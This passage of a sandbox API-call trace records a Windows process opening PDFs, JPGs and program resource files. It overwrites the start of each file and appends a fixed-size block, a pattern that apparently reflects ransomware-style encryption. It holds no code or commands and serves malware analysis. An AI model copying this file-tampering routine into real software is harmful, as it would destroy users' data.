hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.750] ReleaseMutex (hMutex=0x168) returned 1 [0065.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0065.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0065.750] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.753] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x15f99 [0065.754] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.757] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x15f99 [0065.757] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.758] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.758] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.759] CloseHandle (hObject=0x1bc) returned 1 [0065.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.773] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.773] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1c4f5 [0065.773] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.773] ReleaseMutex (hMutex=0x168) returned 1 [0065.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.773] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.776] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1b4f5 [0065.776] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.777] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1b4f5 [0065.777] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.777] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.777] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.777] CloseHandle (hObject=0x1bc) returned 1 [0065.783] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.784] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.784] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b772 [0065.784] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.784] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.784] ReleaseMutex (hMutex=0x168) returned 1 [0065.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Words.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Words.pdf", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Words.pdf", lpUsedDefaultChar=0x0) returned 9 [0065.784] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0066.030] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a772 [0066.035] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.035] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a772 [0066.037] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.038] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.047] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0066.049] CloseHandle (hObject=0x1bc) returned 1 [0066.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x13fb [0066.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.064] ReleaseMutex (hMutex=0x168) returned 1 [0066.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.jpg", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.jpg", lpUsedDefaultChar=0x0) returned 11 [0066.065] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864f58, nNumberOfBytesToRead=0x13fb, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesRead=0x345f2bc*=0x13fb, lpOverlapped=0x0) returned 1 [0066.067] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.067] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1983, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0x1983, lpOverlapped=0x0) returned 1 [0066.067] CloseHandle (hObject=0x1fc) returned 1 [0066.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\rBpWkW9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\rbpwkw9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.069] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.069] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xc03b [0066.069] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.069] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.069] ReleaseMutex (hMutex=0x168) returned 1 [0066.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rBpWkW9.jpg", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rBpWkW9.jpg", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rBpWkW9.jpg", lpUsedDefaultChar=0x0) returned 11 [0066.070] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864f58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0066.071] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xb03b [0066.071] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.071] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xb03b [0066.072] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.072] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.072] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864f58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0066.072] CloseHandle (hObject=0x1fc) returned 1 [0066.074] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.075] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.075] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x127e [0066.075] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.075] ReleaseMutex (hMutex=0x168) returned 1 [0066.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0066.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 16 [0066.076] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864f58, nNumberOfBytesToRead=0x127e, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesRead=0x345f2bc*=0x127e, lpOverlapped=0x0) returned 1 [0066.078] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0066.078] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1806, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0x1806, lpOverlapped=0x0) returned 1 [0066.078] CloseHandle (hObject=0x1fc) returned 1 [0066.079] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.080] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.080] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8907c [0066.080] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.081] ReleaseMutex (hMutex=0x168) returned 1 [0066.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lighthouse.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0066.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lighthouse.jpg", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lighthouse.jpg", lpUsedDefaultChar=0x0) returned 14 [0066.081] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.084] ReadFile (in: hFile=0x1fc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.085] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8807c [0066.085] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.087] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8807c [0066.088] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.089] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.089] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0066.089] WriteFile (in: hFile=0x1fc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.089] CloseHandle (hObject=0x1fc) returned 1 [0066.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.286] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.286] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x851c [0066.286] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.286] ReleaseMutex (hMutex=0x168) returned 1 [0066.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql2000.xsl", lpUsedDefaultChar=0x0) returned 11 [0066.287] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea5688, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0066.289] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x751c [0066.289] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.289] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x751c [0066.290] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.290] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0066.290] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0066.290] CloseHandle (hObject=0x1fc) returned 1 [0066.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\synchronization.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.297] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.297] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3170 [0066.297] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0066.297] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.297] ReleaseMutex (hMutex=0x168) returned 1 [0066.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Synchronization.rll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 